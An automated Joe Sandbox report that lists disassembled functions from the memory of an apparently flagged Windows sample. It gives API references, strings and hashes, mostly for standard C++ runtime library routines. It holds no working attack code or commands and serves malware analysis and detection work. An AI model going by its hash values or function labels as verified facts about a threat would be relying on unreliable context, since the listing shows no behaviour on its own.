APIs

__Cnd_init.LIBCPMT ref: 0247544B
__Mtx_init.LIBCPMT ref: 02475471
std::_Cnd_initX.LIBCPMT ref: 02475494
__Thrd_start.LIBCPMT ref: 024754B9
std::_Cnd_waitX.LIBCPMT ref: 024754D9
std::_Cnd_initX.LIBCPMT ref: 02475506

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 3533dc5d6fe9fe7f8d82f7bc90c6bf1722336b93d829ce2b177027cd31e7d937
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: EE218071C14248AADF15EBB9D844BDEB7F9AF08315F24402FE524B7280DB749A448E75

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A96E0678), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A96E0678), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02499041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 0249904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0249905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02499076
SetLastError.KERNEL32(00000000,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 024990C8

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 79e7b528f51af78aa9cb549d269dbed359ca619351dc98132f4f19895471d8bc
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3201A7322097216EBF242BB6BC88A6B2F55EB06776B30033FF530453E1EF1288555D99

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 02474FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474FCA
int.LIBCPMT ref: 02474FE1

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474FEA
std::_Facet_Register.LIBCPMT ref: 0247501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02475031
__CxxThrowException@8.LIBVCRUNTIME ref: 0247504F

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: c6852b834db11fb5e4047f026c8ffd8bac5ebc5a9f69090eb6e9b8e97eec28b3
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 3E11AC319002289BCB25EBA5D844AEE77B6AF04714F54055FE832AB290DB749A068FE0

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 0247C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0247C401
int.LIBCPMT ref: 0247C418

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 0247C421
std::_Facet_Register.LIBCPMT ref: 0247C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0247C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0247C486

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 7fde380ba2433709925aa48cbce426dcd8f5b3fb0bad4bf98aea0e4913c3a21a
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 5811A1719002289BCF15FBA5D884AEE7B76AF45714F14052FE821BB290DF749A05CFA4

Function 02474E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474E8C
int.LIBCPMT ref: 02474EA3

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474EAC
std::_Facet_Register.LIBCPMT ref: 02474EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02474EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02474F11

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 5cec8dc9ef8baebea86ba37eeaa29eb09289fa26feddf74ed473df9f2c5ccc89
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 4A11A131D00229DBCF15EBA5D844AEE77B6AF44724F14051FE421BB2A0DF749A05CFA5

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024B08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024B08F8
make_shared.LIBCPMT ref: 024B0943

Strings

MOC, xrefs: 024B091B
RCC, xrefs: 024B092A
v)D, xrefs: 024B08F3

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: bfd7818decd64fa599f9f57c8d04e82935a596c9ca942e64c5762841d71a1ba5
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: A0F03CB1A00514DFDB16FBA5C4006AE3B65AF15B05B469097E4445B260CB785988CFA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 0249B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 638c6d89fbce057c4e3dd2c61558b9519687e7f3e0227f2698054f98d66f9aea
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: AD71AF71900216DBDF21CF99E884ABFBFB6EF4572CF54422BE41157290DB708982CBA1

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024A0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

_free.LIBCMT ref: 024A0DB6
_free.LIBCMT ref: 024A0DCD
_free.LIBCMT ref: 024A0DEC
_free.LIBCMT ref: 024A0E07
_free.LIBCMT ref: 024A0E1E

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: f82ca20b189b8137b97b4a785df3662bd38b35e9413d5145dfb4eb3d9334e506
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: D5519032A00704AFDB21DF6AD891B6BB7F5EF69724B14156EE809DB250E731E901CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 024A1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024A17B4
_free.LIBCMT ref: 024A17D4

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: dc67612cb229e640dd9053dbefcd7cb2562cfebe55b7af3f5626d21d4c3eda05
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 4C41DF36A002049FCB20DF79C990AAEB7E6EF98714F1545AED919EB381D731E901CB80

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 0248B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0248B152

Part of subcall function 02481188: _SpinWait.LIBCONCRT ref: 024811A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0248B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0248B198
List.LIBCMT ref: 0248B21B
List.LIBCMT ref: 0248B22A

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: aabba020d17ecca51ada248c89119aed95fc0fc51d4dfc2164fee1eb17813de1
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 3A315232A20616DFCB16FFA4C9906EEBBB2FF05348B04406FC805BB641CB716909CB91

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
